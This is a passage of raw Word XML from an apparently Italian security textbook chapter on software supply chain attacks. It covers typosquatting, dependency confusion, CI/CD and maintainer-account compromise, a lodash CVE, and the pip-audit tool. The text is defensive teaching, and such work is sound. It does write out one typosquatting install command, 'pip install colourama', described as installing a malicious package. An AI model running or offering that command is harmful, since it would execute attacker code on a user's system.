        </w:rPr>
        <w:t xml:space="preserve">Software Supply Chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">filiera di approvvigionamento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del software. Nella OWASP Top 10:2025 è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A03</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, salita drasticamente dal 6° posto della 2021 (dove si chiamava solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vulnerable and Outdated Components</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Il cambio di nome non è cosmetico: la categoria è stata espansa per includere non solo le vulnerabilità nelle dipendenze, ma anche le compromissioni delle pipeline di build, dei registri di pacchetti, dei canali di distribuzione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="382" w:name="Xdc788e026cf9d1ca2d6a873fe6cccce1220b22a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="553" w:name="sec_9_1"/>
      <w:r>
        <w:t xml:space="preserve">9.1 La superficie di attacco della supply chain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="553"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando installi una libreria con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dove sta il rischio? Vediamo i vettori principali, in ordine di frequenza.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="376" w:name="Xc1f9e4de8dff3903ab0d8418c20c63ac0664d65"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vettore 1 — CVE nelle dipendenze (il caso più comune)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una libreria che usi ha un bug di sicurezza con CVE pubblico. La fix è disponibile, ma tu non l’hai ancora applicata. Un attaccante che conosce il CVE può sfruttarlo sulla tua applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio: Apache Struts CVE-2017-5638 (Equifax, </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). La patch era disponibile da due mesi quando l’attacco è avvenuto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="376"/>
    <w:bookmarkStart w:id="377" w:name="Xb82f10ecce429b80bfe64972129b4b141d1ce77"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vettore 2 — Compromissione del codice sorgente di una libreria popolare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un attaccante riesce a inserire codice malevolo nel codice di una libreria open source. La libreria viene distribuita normalmente, attraverso i canali ufficiali,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">firmata e validata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Migliaia di applicazioni la installano automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">XZ Utils, marzo 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ne parliamo a parte (</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_9_4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">§9.4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="377"/>
    <w:bookmarkStart w:id="378" w:name="vettore-3-typosquatting"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vettore 3 — Typosquatting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante pubblica una libreria con un nome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">simile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a uno popolare. Programmatori distratti la installano per errore di battitura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio: tu vuoi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">colorama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(libreria popolare per colorare l’output del terminale), digiti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install colourama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(con la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inglese), installi un pacchetto malevolo. Il pacchetto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">colourama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">può fare quello che vuole sul tuo sistema, perché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esegue codice arbitrario tramite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">setup.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="378"/>
    <w:bookmarkStart w:id="379" w:name="vettore-4-dependency-confusion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vettore 4 — Dependency Confusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configurazione di pip/npm/etc. che cerca pacchetti su più registri (uno pubblico + uno privato aziendale). L’attaccante pubblica sul registro pubblico un pacchetto con lo stesso nome di uno aziendale interno, ma con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">versione più alta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il sistema sceglie il pacchetto pubblico (versione più alta =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">più recente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Codice malevolo eseguito in azienda.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="379"/>
    <w:bookmarkStart w:id="380" w:name="Xd190c9a6f0aeb6336eebd4c09acad667787a3e8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vettore 5 — Compromissione della pipeline CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante non tocca la libreria, tocca l’ambiente in cui la libreria viene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">costruita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Inserisce codice malevolo nel processo di build. Le release ufficiali — firmate dal vero autore — contengono il codice malevolo, ma nessuno se ne accorge perché il codice sorgente in repository sembra normale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SolarWinds, 2020</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il caso più famoso. Backdoor inserita nel processo di build di Orion. Le release firmate da SolarWinds contenevano la backdoor. Vittime: il governo USA, decine di multinazionali.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="380"/>
    <w:bookmarkStart w:id="381" w:name="X17d50050597ac2daff6a5a21b9a41c86508c054"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vettore 6 — Account compromesso del manutentore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante prende il controllo dell’account npm/PyPI di un manutentore di una libreria popolare. Pubblica una nuova versione con codice malevolo. Lo distribuisce attraverso i canali ufficiali. Tutti gli utenti che aggiornano alla versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">patchata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vengono compromessi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio (uno tra molti):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">event-stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(npm), 2018</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il manutentore originale ha trasferito il pacchetto a un volontario che si era offerto. Il volontario era un attaccante. Ha aggiunto codice malevolo che esfiltrava chiavi crittografiche di portafogli Bitcoin.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">8 milioni di download/settimana</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">colpiti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="381"/>
    <w:bookmarkEnd w:id="382"/>
    <w:bookmarkStart w:id="385" w:name="X42e9b3cd77f8577596086f63f3809b3dfab3ced"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="554" w:name="sec_9_2"/>
      <w:r>
        <w:t xml:space="preserve">9.2 Vettore 1 in dettaglio: CVE nelle dipendenze</w:t>
      </w:r>
      <w:bookmarkEnd w:id="554"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo è il problema più frequente. Ogni libreria, prima o poi, ha un CVE. Il punto è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quanto velocemente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lo aggiorni.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="383" w:name="X1698d5c5d56dcf13b49ebc09b0fbe77a83b0e16"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio guidato: una libreria con CVE noto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vediamo un esempio reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-10744</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una vulnerabilità in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lodash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, libreria JavaScript usata in centinaia di migliaia di progetti. Tipo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Prototype Pollution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Versioni vulnerabili: tutte le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; 4.17.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa può fare un attaccante con Prototype Pollution? In breve, può modificare le proprietà di tutti gli oggetti JavaScript in esecuzione, inclusi flag come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">isAdmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. In molti casi porta a privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risoluzione: aggiornare a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lodash &gt;= 4.17.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Patch disponibile dal 2019.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nel 2024, il 23% delle applicazioni JavaScript scansionate da Snyk usava ancora versioni vulnerabili di lodash.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cinque anni dopo la patch.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="383"/>
    <w:bookmarkStart w:id="384" w:name="perché-succede"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perché succede</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tre ragioni:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le dipendenze vengono</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pinnate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">e dimenticate.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lodash==4.17.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">perché funzionava nel 2019 e nessuno ha più toccato il file. Lavorare alla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">regola del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">if it ain’t broke don’t fix it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">significa non aggiornare mai.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Gli aggiornamenti rompono cose.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Talvolta un aggiornamento di sicurezza include anche cambiamenti incompatibili (breaking changes). Il team rinvia l’aggiornamento perché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non c’è tempo per testare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le dipendenze indirette sono invisibili.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tu importi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">importa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">werkzeug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jinja2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">itsdangerous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">click</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">werkzeug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha un CVE, tu sei vulnerabile, ma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">werkzeug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non è scritto nel tuo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per accorgertene serve uno strumento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="384"/>
    <w:bookmarkEnd w:id="385"/>
    <w:bookmarkStart w:id="390" w:name="strumenti-per-python-pip-audit"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="555" w:name="sec_9_3"/>
      <w:r>
        <w:t xml:space="preserve">9.3 Strumenti per Python:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="555"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è lo strumento standard per Python. Mantenuto da PyPA (la stessa organizzazione di pip). Legge il tuo ambiente o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, lo confronta con il database delle vulnerabilità (PyPI Advisory Database + OSV), ti dice cosa è vulnerabile.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="386" w:name="installazione-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con ambiente virtuale attivo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
